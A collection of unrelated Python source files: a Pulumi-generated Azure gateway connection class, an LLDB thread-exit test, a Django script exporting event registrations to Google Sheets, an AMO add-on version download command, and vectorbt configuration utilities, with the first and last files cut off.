alias_opts = pulumi.ResourceOptions(aliases=[pulumi.Alias(type_="azure-nextgen:network/v20200501:VirtualNetworkGatewayConnection"), pulumi.Alias(type_="azure-native:network:VirtualNetworkGatewayConnection"), pulumi.Alias(type_="azure-nextgen:network:VirtualNetworkGatewayConnection"), pulumi.Alias(type_="azure-native:network/latest:VirtualNetworkGatewayConnection"), pulumi.Alias(type_="azure-nextgen:network/latest:VirtualNetworkGatewayConnection"), pulumi.Alias(type_="azure-native:network/v20150615:VirtualNetworkGatewayConnection"), pulumi.Alias(type_="azure-nextgen:network/v20150615:VirtualNetworkGatewayConnection"), pulumi.Alias(type_="azure-native:network/v20160330:VirtualNetworkGatewayConnection"), pulumi.Alias(type_="azure-nextgen:network/v20160330:VirtualNetworkGatewayConnection"), pulumi.Alias(type_="azure-native:network/v20160601:VirtualNetworkGatewayConnection"), pulumi.Alias(type_="azure-nextgen:network/v20160601:VirtualNetworkGatewayConnection"), pulumi.Alias(type_="azure-native:network/v20160901:VirtualNetworkGatewayConnection"), pulumi.Alias(type_="azure-nextgen:network/v20160901:VirtualNetworkGatewayConnection"), pulumi.Alias(type_="azure-native:network/v20161201:VirtualNetworkGatewayConnection"), pulumi.Alias(type_="azure-nextgen:network/v20161201:VirtualNetworkGatewayConnection"), pulumi.Alias(type_="azure-native:network/v20170301:VirtualNetworkGatewayConnection"), pulumi.Alias(type_="azure-nextgen:network/v20170301:VirtualNetworkGatewayConnection"), pulumi.Alias(type_="azure-native:network/v20170601:VirtualNetworkGatewayConnection"), pulumi.Alias(type_="azure-nextgen:network/v20170601:VirtualNetworkGatewayConnection"), pulumi.Alias(type_="azure-native:network/v20170801:VirtualNetworkGatewayConnection"), pulumi.Alias(type_="azure-nextgen:network/v20170801:VirtualNetworkGatewayConnection"), pulumi.Alias(type_="azure-native:network/v20170901:VirtualNetworkGatewayConnection"), pulumi.Alias(type_="azure-nextgen:network/v20170901:VirtualNetworkGatewayConnection"), pulumi.Alias(type_="azure-native:network/v20171001:VirtualNetworkGatewayConnection"), pulumi.Alias(type_="azure-nextgen:network/v20171001:VirtualNetworkGatewayConnection"), pulumi.Alias(type_="azure-native:network/v20171101:VirtualNetworkGatewayConnection"), pulumi.Alias(type_="azure-nextgen:network/v20171101:VirtualNetworkGatewayConnection"), pulumi.Alias(type_="azure-native:network/v20180101:VirtualNetworkGatewayConnection"), pulumi.Alias(type_="azure-nextgen:network/v20180101:VirtualNetworkGatewayConnection"), pulumi.Alias(type_="azure-native:network/v20180201:VirtualNetworkGatewayConnection"), pulumi.Alias(type_="azure-nextgen:network/v20180201:VirtualNetworkGatewayConnection"), pulumi.Alias(type_="azure-native:network/v20180401:VirtualNetworkGatewayConnection"), pulumi.Alias(type_="azure-nextgen:network/v20180401:VirtualNetworkGatewayConnection"), pulumi.Alias(type_="azure-native:network/v20180601:VirtualNetworkGatewayConnection"), pulumi.Alias(type_="azure-nextgen:network/v20180601:VirtualNetworkGatewayConnection"), pulumi.Alias(type_="azure-native:network/v20180701:VirtualNetworkGatewayConnection"), pulumi.Alias(type_="azure-nextgen:network/v20180701:VirtualNetworkGatewayConnection"), pulumi.Alias(type_="azure-native:network/v20180801:VirtualNetworkGatewayConnection"), pulumi.Alias(type_="azure-nextgen:network/v20180801:VirtualNetworkGatewayConnection"), pulumi.Alias(type_="azure-native:network/v20181001:VirtualNetworkGatewayConnection"), pulumi.Alias(type_="azure-nextgen:network/v20181001:VirtualNetworkGatewayConnection"), pulumi.Alias(type_="azure-native:network/v20181101:VirtualNetworkGatewayConnection"), pulumi.Alias(type_="azure-nextgen:network/v20181101:VirtualNetworkGatewayConnection"), pulumi.Alias(type_="azure-native:network/v20181201:VirtualNetworkGatewayConnection"), pulumi.Alias(type_="azure-nextgen:network/v20181201:VirtualNetworkGatewayConnection"), pulumi.Alias(type_="azure-native:network/v20190201:VirtualNetworkGatewayConnection"), pulumi.Alias(type_="azure-nextgen:network/v20190201:VirtualNetworkGatewayConnection"), pulumi.Alias(type_="azure-native:network/v20190401:VirtualNetworkGatewayConnection"), pulumi.Alias(type_="azure-nextgen:network/v20190401:VirtualNetworkGatewayConnection"), pulumi.Alias(type_="azure-native:network/v20190601:VirtualNetworkGatewayConnection"), pulumi.Alias(type_="azure-nextgen:network/v20190601:VirtualNetworkGatewayConnection"), pulumi.Alias(type_="azure-native:network/v20190701:VirtualNetworkGatewayConnection"), pulumi.Alias(type_="azure-nextgen:network/v20190701:VirtualNetworkGatewayConnection"), pulumi.Alias(type_="azure-native:network/v20190801:VirtualNetworkGatewayConnection"), pulumi.Alias(type_="azure-nextgen:network/v20190801:VirtualNetworkGatewayConnection"), pulumi.Alias(type_="azure-native:network/v20190901:VirtualNetworkGatewayConnection"), pulumi.Alias(type_="azure-nextgen:network/v20190901:VirtualNetworkGatewayConnection"), pulumi.Alias(type_="azure-native:network/v20191101:VirtualNetworkGatewayConnection"), pulumi.Alias(type_="azure-nextgen:network/v20191101:VirtualNetworkGatewayConnection"), pulumi.Alias(type_="azure-native:network/v20191201:VirtualNetworkGatewayConnection"), pulumi.Alias(type_="azure-nextgen:network/v20191201:VirtualNetworkGatewayConnection"), pulumi.Alias(type_="azure-native:network/v20200301:VirtualNetworkGatewayConnection"), pulumi.Alias(type_="azure-nextgen:network/v20200301:VirtualNetworkGatewayConnection"), pulumi.Alias(type_="azure-native:network/v20200401:VirtualNetworkGatewayConnection"), pulumi.Alias(type_="azure-nextgen:network/v20200401:VirtualNetworkGatewayConnection"), pulumi.Alias(type_="azure-native:network/v20200601:VirtualNetworkGatewayConnection"), pulumi.Alias(type_="azure-nextgen:network/v20200601:VirtualNetworkGatewayConnection"), pulumi.Alias(type_="azure-native:network/v20200701:VirtualNetworkGatewayConnection"), pulumi.Alias(type_="azure-nextgen:network/v20200701:VirtualNetworkGatewayConnection"), pulumi.Alias(type_="azure-native:network/v20200801:VirtualNetworkGatewayConnection"), pulumi.Alias(type_="azure-nextgen:network/v20200801:VirtualNetworkGatewayConnection")])
opts = pulumi.ResourceOptions.merge(opts, alias_opts)
super(VirtualNetworkGatewayConnection, __self__).__init__(
'azure-native:network/v20200501:VirtualNetworkGatewayConnection',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None) -> 'VirtualNetworkGatewayConnection':
"""
Get an existing VirtualNetworkGatewayConnection resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = dict()
__props__["authorization_key"] = None
__props__["connection_protocol"] = None
__props__["connection_status"] = None
__props__["connection_type"] = None
__props__["dpd_timeout_seconds"] = None
__props__["egress_bytes_transferred"] = None
__props__["enable_bgp"] = None
__props__["etag"] = None
__props__["express_route_gateway_bypass"] = None
__props__["ingress_bytes_transferred"] = None
__props__["ipsec_policies"] = None
__props__["local_network_gateway2"] = None
__props__["location"] = None
__props__["name"] = None
__props__["peer"] = None
__props__["provisioning_state"] = None
__props__["resource_guid"] = None
__props__["routing_weight"] = None
__props__["shared_key"] = None
__props__["tags"] = None
__props__["traffic_selector_policies"] = None
__props__["tunnel_connection_status"] = None
__props__["type"] = None
__props__["use_local_azure_ip_address"] = None
__props__["use_policy_based_traffic_selectors"] = None
__props__["virtual_network_gateway1"] = None
__props__["virtual_network_gateway2"] = None
return VirtualNetworkGatewayConnection(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter(name="authorizationKey")
def authorization_key(self) -> pulumi.Output[Optional[str]]:
"""
The authorizationKey.
"""
return pulumi.get(self, "authorization_key")
@property
@pulumi.getter(name="connectionProtocol")
def connection_protocol(self) -> pulumi.Output[Optional[str]]:
"""
Connection protocol used for this connection.
"""
return pulumi.get(self, "connection_protocol")
@property
@pulumi.getter(name="connectionStatus")
def connection_status(self) -> pulumi.Output[str]:
"""
Virtual Network Gateway connection status.
"""
return pulumi.get(self, "connection_status")
@property
@pulumi.getter(name="connectionType")
def connection_type(self) -> pulumi.Output[str]:
"""
Gateway connection type.
"""
return pulumi.get(self, "connection_type")
@property
@pulumi.getter(name="dpdTimeoutSeconds")
def dpd_timeout_seconds(self) -> pulumi.Output[Optional[int]]:
"""
The dead peer detection timeout of this connection in seconds.
"""
return pulumi.get(self, "dpd_timeout_seconds")
@property
@pulumi.getter(name="egressBytesTransferred")
def egress_bytes_transferred(self) -> pulumi.Output[float]:
"""
The egress bytes transferred in this connection.
"""
return pulumi.get(self, "egress_bytes_transferred")
@property
@pulumi.getter(name="enableBgp")
def enable_bgp(self) -> pulumi.Output[Optional[bool]]:
"""
EnableBgp flag.
"""
return pulumi.get(self, "enable_bgp")
@property
@pulumi.getter
def etag(self) -> pulumi.Output[str]:
"""
A unique read-only string that changes whenever the resource is updated.
"""
return pulumi.get(self, "etag")
@property
@pulumi.getter(name="expressRouteGatewayBypass")
def express_route_gateway_bypass(self) -> pulumi.Output[Optional[bool]]:
"""
Bypass ExpressRoute Gateway for data forwarding.
"""
return pulumi.get(self, "express_route_gateway_bypass")
@property
@pulumi.getter(name="ingressBytesTransferred")
def ingress_bytes_transferred(self) -> pulumi.Output[float]:
"""
The ingress bytes transferred in this connection.
"""
return pulumi.get(self, "ingress_bytes_transferred")
@property
@pulumi.getter(name="ipsecPolicies")
def ipsec_policies(self) -> pulumi.Output[Optional[Sequence['outputs.IpsecPolicyResponse']]]:
"""
The IPSec Policies to be considered by this connection.
"""
return pulumi.get(self, "ipsec_policies")
@property
@pulumi.getter(name="localNetworkGateway2")
def local_network_gateway2(self) -> pulumi.Output[Optional['outputs.LocalNetworkGatewayResponse']]:
"""
The reference to local network gateway resource.
"""
return pulumi.get(self, "local_network_gateway2")
@property
@pulumi.getter
def location(self) -> pulumi.Output[Optional[str]]:
"""
Resource location.
"""
return pulumi.get(self, "location")
@property
@pulumi.getter
def name(self) -> pulumi.Output[str]:
"""
Resource name.
"""
return pulumi.get(self, "name")
@property
@pulumi.getter
def peer(self) -> pulumi.Output[Optional['outputs.SubResourceResponse']]:
"""
The reference to peerings resource.
"""
return pulumi.get(self, "peer")
@property
@pulumi.getter(name="provisioningState")
def provisioning_state(self) -> pulumi.Output[str]:
"""
The provisioning state of the virtual network gateway connection resource.
"""
return pulumi.get(self, "provisioning_state")
@property
@pulumi.getter(name="resourceGuid")
def resource_guid(self) -> pulumi.Output[str]:
"""
The resource GUID property of the virtual network gateway connection resource.
"""
return pulumi.get(self, "resource_guid")
@property
@pulumi.getter(name="routingWeight")
def routing_weight(self) -> pulumi.Output[Optional[int]]:
"""
The routing weight.
"""
return pulumi.get(self, "routing_weight")
@property
@pulumi.getter(name="sharedKey")
def shared_key(self) -> pulumi.Output[Optional[str]]:
"""
The IPSec shared key.
"""
return pulumi.get(self, "shared_key")
@property
@pulumi.getter
def tags(self) -> pulumi.Output[Optional[Mapping[str, str]]]:
"""
Resource tags.
"""
return pulumi.get(self, "tags")
@property
@pulumi.getter(name="trafficSelectorPolicies")
def traffic_selector_policies(self) -> pulumi.Output[Optional[Sequence['outputs.TrafficSelectorPolicyResponse']]]:
"""
The Traffic Selector Policies to be considered by this connection.
"""
return pulumi.get(self, "traffic_selector_policies")
@property
@pulumi.getter(name="tunnelConnectionStatus")
def tunnel_connection_status(self) -> pulumi.Output[Sequence['outputs.TunnelConnectionHealthResponse']]:
"""
Collection of all tunnels' connection health status.
"""
return pulumi.get(self, "tunnel_connection_status")
@property
@pulumi.getter
def type(self) -> pulumi.Output[str]:
"""
Resource type.
"""
return pulumi.get(self, "type")
@property
@pulumi.getter(name="useLocalAzureIpAddress")
def use_local_azure_ip_address(self) -> pulumi.Output[Optional[bool]]:
"""
Use private local Azure IP for the connection.
"""
return pulumi.get(self, "use_local_azure_ip_address")
@property
@pulumi.getter(name="usePolicyBasedTrafficSelectors")
def use_policy_based_traffic_selectors(self) -> pulumi.Output[Optional[bool]]:
"""
Enable policy-based traffic selectors.
"""
return pulumi.get(self, "use_policy_based_traffic_selectors")
@property
@pulumi.getter(name="virtualNetworkGateway1")
def virtual_network_gateway1(self) -> pulumi.Output['outputs.VirtualNetworkGatewayResponse']:
"""
The reference to virtual network gateway resource.
"""
return pulumi.get(self, "virtual_network_gateway1")
@property
@pulumi.getter(name="virtualNetworkGateway2")
def virtual_network_gateway2(self) -> pulumi.Output[Optional['outputs.VirtualNetworkGatewayResponse']]:
"""
The reference to virtual network gateway resource.
"""
return pulumi.get(self, "virtual_network_gateway2")
def translate_output_property(self, prop):
return _tables.CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop
def translate_input_property(self, prop):
return _tables.SNAKE_TO_CAMEL_CASE_TABLE.get(prop) or prop
|
"""
Make sure that we handle an expression on a thread, if
the thread exits while the expression is running.
"""
import lldb
from lldbsuite.test.decorators import *
import lldbsuite.test.lldbutil as lldbutil
from lldbsuite.test.lldbtest import *
class TestExitDuringExpression(TestBase):
mydir = TestBase.compute_mydir(__file__)
NO_DEBUG_INFO_TESTCASE = True
@skipIfWindows
@skipIf(oslist=["linux"], archs=["arm", "aarch64"], bugnumber="llvm.org/pr48414")
@expectedFailureAll(oslist=["freebsd"], bugnumber="llvm.org/pr48414")
@expectedFailureNetBSD
def test_exit_before_one_thread_unwind(self):
"""Test the case where we exit within the one thread timeout"""
self.exiting_expression_test(True, True)
@skipIfWindows
@skipIf(oslist=["linux"], archs=["arm", "aarch64"], bugnumber="llvm.org/pr48414")
@expectedFailureAll(oslist=["freebsd"], bugnumber="llvm.org/pr48414")
@expectedFailureNetBSD
def test_exit_before_one_thread_no_unwind(self):
"""Test the case where we exit within the one thread timeout"""
self.exiting_expression_test(True, False)
@skipIfWindows
def test_exit_after_one_thread_unwind(self):
"""Test the case where we exit within the one thread timeout"""
self.exiting_expression_test(False, True)
@skipIfWindows
def test_exit_after_one_thread_no_unwind(self):
"""Test the case where we exit within the one thread timeout"""
self.exiting_expression_test(False, False)
def setUp(self):
TestBase.setUp(self)
self.main_source_file = lldb.SBFileSpec("main.c")
self.build()
def exiting_expression_test(self, before_one_thread_timeout , unwind):
"""function_to_call sleeps for g_timeout microseconds, then calls pthread_exit.
This test calls function_to_call with an overall timeout of 500
microseconds, and a one_thread_timeout as passed in.
It also sets unwind_on_exit for the call to the unwind passed in.
This allows you to have the thread exit either before the one thread
timeout is passed. """
(target, process, thread, bkpt) = lldbutil.run_to_source_breakpoint(self,
"Break here and cause the thread to exit", self.main_source_file)
# We'll continue to this breakpoint after running our expression:
return_bkpt = target.BreakpointCreateBySourceRegex("Break here to make sure the thread exited", self.main_source_file)
frame = thread.frames[0]
tid = thread.GetThreadID()
# Find the timeout:
var_options = lldb.SBVariablesOptions()
var_options.SetIncludeArguments(False)
var_options.SetIncludeLocals(False)
var_options.SetIncludeStatics(True)
value_list = frame.GetVariables(var_options)
g_timeout = value_list.GetFirstValueByName("g_timeout")
self.assertTrue(g_timeout.IsValid(), "Found g_timeout")
error = lldb.SBError()
timeout_value = g_timeout.GetValueAsUnsigned(error)
self.assertSuccess(error, "Couldn't get timeout value")
one_thread_timeout = 0
if (before_one_thread_timeout):
one_thread_timeout = timeout_value * 2
else:
one_thread_timeout = int(timeout_value / 2)
options = lldb.SBExpressionOptions()
options.SetUnwindOnError(unwind)
options.SetOneThreadTimeoutInMicroSeconds(one_thread_timeout)
options.SetTimeoutInMicroSeconds(4 * timeout_value)
result = frame.EvaluateExpression("function_to_call()", options)
# Make sure the thread actually exited:
thread = process.GetThreadByID(tid)
self.assertFalse(thread.IsValid(), "The thread exited")
# Make sure the expression failed:
self.assertFalse(result.GetError().Success(), "Expression failed.")
# Make sure we can keep going:
threads = lldbutil.continue_to_breakpoint(process, return_bkpt)
if not threads:
self.fail("didn't get any threads back after continuing")
self.assertEqual(len(threads), 1, "One thread hit our breakpoint")
thread = threads[0]
frame = thread.frames[0]
# Now get the return value, if we successfully caused the thread to exit
# it should be 10, not 20.
ret_val = frame.FindVariable("ret_val")
self.assertSuccess(ret_val.GetError(), "Found ret_val")
ret_val_value = ret_val.GetValueAsSigned(error)
self.assertSuccess(error, "Got ret_val's value")
self.assertEqual(ret_val_value, 10, "We put the right value in ret_val")
|
import os
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "oschub.settings")
import django
django.setup()
import gspread
from google.oauth2 import service_account
from eventreg.models import EventUserData, Event
from accounts.models import MailList
import datetime
from decouple import config
import json
# creates a spreadSheet.
def createSpreadSheet(mailList, title="NewSpreadsheet"):
try:
global createdNewSpreadSheet
if not createdNewSpreadSheet:
sheet = service.create(title)
print("[$] SpreadSheet ID: " + str(sheet.id))
for index, emailid in enumerate(mailList):
# Commented code cause Ownership Access error
# if index == 0:
# sheet.share(emailid, perm_type="user", role="owner")
# else:
sheet.share(emailid, perm_type="user", role="writer", notify=True)
print("Shared sheet to " + emailid)
createdNewSpreadSheet = True
except gspread.exceptions.APIError as error:
print("API Error: Trying Again !!")
print(error)
createSpreadSheet(mailList, title) # If API error then try again
def createSheet(title="EventName", row="10000", col="25"):
try:
global createdNewSpreadSheet
sheet = service.open("Events") # opens the file "Events"
print("[x] Found spreadsheet 'Events' ")
if createdNewSpreadSheet:
sheet.add_worksheet(title, rows=row, cols=col)
tmp = sheet.get_worksheet(0)
sheet.del_worksheet(tmp)
print(f"[!] Renamed default Sheet1 to {title}")
createdNewSpreadSheet = False
else:
sheet.add_worksheet(title, rows=row, cols=col)
print("[x] Added sheet - " + title)
worksheet = sheet.worksheet(title)
worksheet.append_row(["Reg No", "Name", "Email", "Registered", "Attended"])
worksheet.format(
"A1:E1", {"horizontalAlignment": "CENTER", "textFormat": {"bold": True}}
)
print(f"[x] Added Header data to the sheet {title}")
return worksheet
except gspread.exceptions.SpreadsheetNotFound:
print('[!] "Events" SpreadSheet not found, attempting to create a new one')
createSpreadSheet(admin_mail, "Events")
createSheet(title)
def getCompletedEvents():
# Filtering out the events that are over
events = Event.objects.all().filter(
eventDate__lt=datetime.date.today()
) # gets the events with date before today
eventlist = []
for event in events:
eventlist.append(event.eventName.replace(":", "|"))
events = Event.objects.filter(eventDate=datetime.date.today()).filter(
eventEndTime__lt=datetime.datetime.now().strftime("%H:%M:%S")
)
for event in events:
eventlist.append(event.eventName.replace(":", "|"))
return eventlist
def updateData():
admin_mail_latest = getAdminMail()
event_list = getCompletedEvents()
# If spreadsheet not found then make a new one
try:
sheet = service.open("Events")
except gspread.exceptions.SpreadsheetNotFound:
print('[!] "Events" SpreadSheet not found, attempting to create a new one')
createSpreadSheet(admin_mail, "Events")
sheet = service.open("Events")
# sharing the sheet once again to share the file with newly added user
for email_id in admin_mail_latest:
if email_id not in admin_mail:
sheet.share(email_id, perm_type="user", role="writer", notify=True)
print("Shared sheet to " + email_id)
# get all the available worksheets
worksheet = sheet.worksheets()
sheetList = []
for work in worksheet:
sheetList.append(work.title)
# getting user data for the events that are over
for event in event_list:
studentList = []
if event in sheetList:
print(f"[!] Skipping the Sheet, the worksheet {event} already exists !!")
else:
students = EventUserData.objects.filter(
eventName__eventName=event.replace("|", ":")
)
for student in students:
studentList.append(
[
student.studentReg,
student.studentName,
student.studentEmail,
"Yes" if student.studentRegistered else "No",
"Yes" if student.studentCheckedIn else "No",
]
)
worksheet = createSheet(event)
worksheet.batch_update(
[{"range": f"A2:E{len(studentList) + 1}", "values": studentList}]
)
print("[x] Added user data set to sheet " + event)
def getAdminMail():
admin_mail = []
mailList = MailList.objects.all()
for mail in mailList:
admin_mail.append(mail.email)
return admin_mail
def delAllSpreadsheet():
for spreadsheet in service.openall():
service.del_spreadsheet(spreadsheet.id)
print("deleted " + spreadsheet.title + " || " + spreadsheet.id)
# CAUTION: First Email is given owner access, rest all emails are given writer access due to API restrictions.
createdNewSpreadSheet = False
admin_mail = getAdminMail()
SCOPE = [
"https://spreadsheets.google.com/feeds",
"https://www.googleapis.com/auth/spreadsheets",
"https://www.googleapis.com/auth/drive.file",
"https://www.googleapis.com/auth/drive",
]
credential_info = json.loads(config("CREDENTIALS"))
credential = service_account.Credentials.from_service_account_info(
credential_info, scopes=SCOPE
)
service = gspread.authorize(credential)
if __name__ == "__main__":
# Use the following method to update data to the google spreadsheet
updateData()
# Use the following method to delete all the existing spreadsheets of the bot account
# delAllSpreadsheet()
|
import requests
from os.path import basename
from urllib.parse import urlparse
from django.conf import settings
from django.core.files.storage import default_storage as storage
from django.core.management.base import BaseCommand, CommandError
from django.db.transaction import atomic
from olympia import amo
from olympia.amo.tests import version_factory
from olympia.addons.models import Addon
class KeyboardInterruptError(Exception):
pass
class Command(BaseCommand):
"""Download versions for a particular add-on from AMO public data."""
VERSIONS_API_URL = (
'https://addons.mozilla.org/api/v4/addons/addon/%(slug)s/versions/'
)
def add_arguments(self, parser):
parser.add_argument('slug', type=str)
def handle(self, *args, **options):
if not settings.DEBUG:
raise CommandError(
'As a safety precaution this command only works if DEBUG=True.'
)
self.fetch_versions_data(**options)
def get_max_pages(self, slug):
response = requests.get(self.VERSIONS_API_URL % {'slug': slug})
return response.json()['page_count']
def fetch_versions_data(self, **options):
self.addon = Addon.objects.get(slug=options['slug'])
slug = self.addon.slug
pages = range(1, self.get_max_pages(slug) + 1)
print('Fetching pages from 1 to %s' % max(pages))
for page in pages:
self._get_versions_from_page(slug, page)
def _get_versions_from_page(self, slug, page):
data = []
print('fetching %s' % page)
query_params = {'page': page}
response = requests.get(
self.VERSIONS_API_URL % {'slug': slug}, params=query_params
)
print('fetched %s' % page)
for version in response.json()['results']:
self._handle_version(version)
return data
def _download_file(self, url, file_):
with storage.open(file_.current_file_path, 'wb') as f:
data = requests.get(url)
f.write(data.content)
def _handle_version(self, data):
if (
self.addon.versions(manager='unfiltered_for_relations')
.filter(version=data['version'])
.exists()
):
print('Skipping %s (version already exists' % data['version'])
return
files_data = data['files'][0]
file_kw = {
'hash': files_data['hash'],
'filename': basename(urlparse(files_data['url']).path),
'status': amo.STATUS_CHOICES_API_LOOKUP[files_data['status']],
'platform': amo.PLATFORM_DICT[files_data['platform']].id,
'size': files_data['size'],
'is_webextension': files_data['is_webextension'],
'is_mozilla_signed_extension': (files_data['is_mozilla_signed_extension']),
'strict_compatibility': (data['is_strict_compatibility_enabled']),
}
version_kw = {
'version': data['version'],
# FIXME: maybe reviewed/created would make sense at least, to
# get more or less the correct ordering ?
# Everything else we don't really care about at the moment.
}
print('Creating version %s' % data['version'])
with atomic():
version = version_factory(addon=self.addon, file_kw=file_kw, **version_kw)
# Download the file to the right path.
print('Downloading file for version %s' % data['version'])
self._download_file(files_data['url'], version.files.all()[0])
|
"""Utilities for configuration."""
from copy import copy, deepcopy
from collections import namedtuple
import dill
import inspect
from vectorbt import _typing as tp
from vectorbt.utils import checks
from vectorbt.utils.attr import deep_getattr
def resolve_dict(dct: tp.DictLikeSequence, i: tp.Optional[int] = None) -> dict:
"""Select keyword arguments."""
if dct is None:
dct = {}
if isinstance(dct, dict):
return dict(dct)
if i is not None:
_dct = dct[i]
if _dct is None:
_dct = {}
return dict(_dct)
raise ValueError("Cannot resolve dict")
def get_func_kwargs(func: tp.Callable) -> dict:
"""Get keyword arguments with defaults of a function."""
signature = inspect.signature(func)
return {
k: v.default
for k, v in signature.parameters.items()
if v.default is not inspect.Parameter.empty
}
def get_func_arg_names(func: tp.Callable) -> tp.List[str]:
"""Get argument names of a function."""
signature = inspect.signature(func)
return [
p.name for p in signature.parameters.values()
if p.kind != p.VAR_POSITIONAL and p.kind != p.VAR_KEYWORD
]
class atomic_dict(dict):
"""Dict that behaves like a single value when merging."""
pass
InConfigLikeT = tp.Union[None, dict, "ConfigT"]
OutConfigLikeT = tp.Union[dict, "ConfigT"]
def convert_to_dict(dct: InConfigLikeT, nested: bool = True) -> dict:
"""Convert any dict (apart from `atomic_dict`) to `dict`.
Set `nested` to True to convert all child dicts in recursive manner."""
if dct is None:
dct = {}
if isinstance(dct, atomic_dict):
dct = atomic_dict(dct)
else:
dct = dict(dct)
if not nested:
return dct
for k, v in dct.items():
if isinstance(v, dict):
dct[k] = convert_to_dict(v, nested=nested)
else:
dct[k] = v
return dct
def set_dict_item(dct: dict, k: tp.Any, v: tp.Any, force: bool = False) -> None:
"""Set dict item.
If the dict is of the type `Config`, also passes `force` keyword to override blocking flags."""
if isinstance(dct, Config):
dct.__setitem__(k, v, force=force)
else:
dct[k] = v
def copy_dict(dct: InConfigLikeT, copy_mode: str = 'shallow', nested: bool = True) -> OutConfigLikeT:
"""Copy dict based on a copy mode.
The following modes are supported:
* 'shallow': Copies keys only.
* 'hybrid': Copies keys and values using `copy.copy`.
* 'deep': Copies the whole thing using `copy.deepcopy`.
Set `nested` to True to copy all child dicts in recursive manner."""
if dct is None:
dct = {}
checks.assert_type(copy_mode, str)
copy_mode = copy_mode.lower()
if copy_mode not in ['shallow', 'hybrid', 'deep']:
raise ValueError(f"Copy mode '{copy_mode}' not supported")
if copy_mode == 'deep':
return deepcopy(dct)
if isinstance(dct, Config):
return dct.copy(
copy_mode=copy_mode,
nested=nested
)
dct_copy = copy(dct) # copy structure using shallow copy
for k, v in dct_copy.items():
if nested and isinstance(v, dict):
_v = copy_dict(v, copy_mode=copy_mode, nested=nested)
else:
if copy_mode == 'hybrid':
_v = copy(v) # copy values using shallow copy
else:
_v = v
set_dict_item(dct_copy, k, _v, force=True)
return dct_copy
def update_dict(x: InConfigLikeT,
y: InConfigLikeT,
nested: bool = True,
force: bool = False,
same_keys: bool = False) -> None:
"""Update dict with keys and values from other dict.
Set `nested` to True to update all child dicts in recursive manner.
For `force`, see `set_dict_item`.
If you want to treat any dict as a single value, wrap it with `atomic_dict`.
!!! note
If the child dict is not atomic, it will copy only its values, not its meta."""
if x is None:
return
if y is None:
return
checks.assert_type(x, dict)
checks.assert_type(y, dict)
for k, v in y.items():
if nested \
and k in x \
and isinstance(x[k], dict) \
and isinstance(v, dict) \
and not isinstance(v, atomic_dict):
update_dict(x[k], v, force=force)
else:
if same_keys and k not in x:
continue
set_dict_item(x, k, v, force=force)
def merge_dicts(*dicts: InConfigLikeT,
to_dict: bool = True,
copy_mode: tp.Optional[str] = 'shallow',
nested: bool = True,
same_keys: bool = False) -> OutConfigLikeT:
"""Merge dicts.
Args:
*dicts (dict): Dicts.
to_dict (bool): Whether to call `convert_to_dict` on each dict prior to copying.
copy_mode (str): Mode for `copy_dict` to copy each dict prior to merging.
Pass None to not copy.
nested (bool): Whether to merge all child dicts in recursive manner.
same_keys (bool): Whether to merge on the overlapping keys only."""
# copy only once
if to_dict:
dicts = tuple([convert_to_dict(dct, nested=nested) for dct in dicts])
if copy_mode is not None:
dicts = tuple([copy_dict(dct, copy_mode=copy_mode, nested=nested) for dct in dicts])
x, y = dicts[0], dicts[1]
if isinstance(x, atomic_dict) or isinstance(y, atomic_dict):
x = y
else:
update_dict(x, y, nested=nested, force=True, same_keys=same_keys)
if len(dicts) > 2:
return merge_dicts(
x, *dicts[2:],
to_dict=False, # executed only once
copy_mode=None, # executed only once
nested=nested,
same_keys=same_keys
)
return x
_RaiseKeyError = object()
DumpTuple = namedtuple('DumpTuple', ('cls', 'dumps'))
PickleableT = tp.TypeVar("PickleableT", bound="Pickleable")
class Pickleable:
"""Superclass that defines abstract properties and methods for pickle-able classes."""
def dumps(self, **kwargs) -> bytes:
"""Pickle to bytes."""
raise NotImplementedError
@classmethod
def loads(cls: tp.Type[PickleableT], dumps: bytes, **kwargs) -> PickleableT:
"""Unpickle from bytes."""
raise NotImplementedError
def save(self, fname: tp.FileName, **kwargs) -> None:
"""Save dumps to a file."""
dumps = self.dumps(**kwargs)
with open(fname, "wb") as f:
f.write(dumps)
@classmethod
def load(cls: tp.Type[PickleableT], fname: tp.FileName, **kwargs) -> PickleableT:
"""Load dumps from a file and create new instance."""
with open(fname, "rb") as f:
dumps = f.read()
return cls.loads(dumps, **kwargs)
PickleableDictT = tp.TypeVar("PickleableDictT", bound="PickleableDict")
class PickleableDict(Pickleable, dict):
"""Dict that may contain values of type `Pickleable`."""
def dumps(self, **kwargs) -> bytes:
"""Pickle to bytes."""
dct = dict()
for k, v in self.items():
if isinstance(v, Pickleable):
dct[k] = DumpTuple(cls=v.__class__, dumps=v.dumps(**kwargs))
else:
dct[k] = v
return dill.dumps(dct, **kwargs)
@classmethod
def loads(cls: tp.Type[PickleableDictT], dumps: bytes, **kwargs) -> PickleableDictT:
"""Unpickle from bytes."""
config = dill.loads(dumps, **kwargs)
for k, v in config.items():
if isinstance(v, DumpTuple):
config[k] = v.cls.loads(v.dumps, **kwargs)
return cls(**config)
def load_update(self, fname: tp.FileName, **kwargs) -> None:
"""Load dumps from a file and update this instance."""
self.clear()
self.update(self.load(fname, **kwargs))
ConfigT = tp.TypeVar("ConfigT", bound="Config")
class Config(PickleableDict):
"""Extends dict with config features such as nested updates, frozen keys/values, and pickling.
Args:
dct (dict): Dict to construct this config from.
copy_kwargs (dict): Keyword arguments passed to `copy_dict` for copying `dct` and `reset_dct`.
Copy mode defaults to 'shallow' if `readonly`, otherwise to 'hybrid'.
reset_dct (dict): Dict to fall back to in case of resetting.
If None, copies `dct` using `reset_dct_copy_kwargs`.
reset_dct_copy_kwargs (dict): Keyword arguments that override `copy_kwargs` for `reset_dct`.
frozen_keys (bool): Whether to deny updates to the keys of the config.
Defaults to False.
readonly (bool): Whether to deny updates to the keys and values of the config.
Defaults to False.
nested (bool): Whether to do operations recursively on each child dict.
Such operations include copy, update, and merge.
Disable to treat each child dict as a single value. Defaults to True.
convert_dicts (bool or type): Whether to convert child dicts to configs with the same configuration.
This will trigger a waterfall reaction across all child dicts.
